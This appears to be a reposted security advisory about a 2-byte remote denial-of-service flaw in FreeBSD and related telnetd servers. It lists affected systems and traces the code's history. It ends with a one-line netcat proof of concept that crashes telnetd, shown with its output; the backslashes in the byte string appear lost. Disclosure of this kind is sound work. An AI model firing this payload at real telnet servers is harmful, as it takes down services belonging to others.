in

2-byte Remote DoS in FreeBSD telnetd

FreeBSD-telnetd, NetBSD-telnetd, netkit-telnetd, telnetd in Kerberos Version 5 Applications and inetutils-telnetd are standard telnet servers used in several Linux distributions, BSD systems, UNIX systems and commercial products:

  • FreeBSD, NetBSD
  • Debian, Fedora, Gentoo, ArchLinux, … – using inetutils-telnetd or netkit-telnetd
  • specific Palo Alto appliances
  • specific Cisco appliances
  • specific Brocade appliances
  • specific Arista appliances
  • OS running telnetd from Kerberos Version 5 Applications: this may include BSD 4.3 Reno, UNICOS 5.1 to UNICOS 7.0, SunOs 3.5 to SunOs 4.1, DYNIX V3.0.17.9 and Ultrix 3.1 to Ultrix 4.0. Note that these OS may be EOL.

From our understanding, the first implementation containing the vulnerabilities dates from February 1991. This is the Kerberos telnetd implementation available at https://github.com/krb5/krb5-appl/blob/f8420ba3e60160da670f4f9a5b9f5429f67cd174/telnet/telnetd.

This code has been merged into FreeBSD in the 90s. Then netkit-telnetd comes from a very old version of the FreeBSD telnetd. And finally inetutils-telnetd is a fork of netkit-telnetd.

These vulnerabilities are very old (at least 30 years).

In all these implementations, the vulnerable part of the code base has not been updated for 30 years and appears not to be maintained anymore.

A part of the list of affected products was obtained by using CVE-2020-10188 (a vulnerability in netkit-telnetd). We can find advisories from Cisco, Palo Alto, Brocade and Arista referencing CVE-2020-10188 in their products.

Furthermore, from https://github.com/krb5/krb5-appl/blob/f8420ba3e60160da670f4f9a5b9f5429f67cd174/telnet/README, the release date is February 22, 1991 and the supported OS are BSD 4.3 Reno, UNICOS 5.1 to UNICOS 7.0, SunOs 3.5 to SunOs 4.1, DYNIX V3.0.17.9 and Ultrix 3.1 to Ultrix 4.0. We can assume these OS running kerberos-telnetd are also vulnerable.

It is possible to remotely crash the “standard” FreeBSD telnetd server by sending 2 bytes (xffxf7) from the network, as shown below:

kali% printf “xffxf7” | nc -n -v 192.168.1.200 23
(UNKNOWN) [192.168.1.200] 23 (telnet) open
<FF><FD>%
kali%

This post was created with our nice and easy submission form. Create your post!

What do you think?

Posted by SH

Leave a Reply

Your email address will not be published. Required fields are marked *

GIPHY App Key not set. Please check settings

Linux Kernel Exploit (CVE-2022-32250) with mqueue

MERCURY leveraging Log4j 2 Flaws to target Israeli Organisation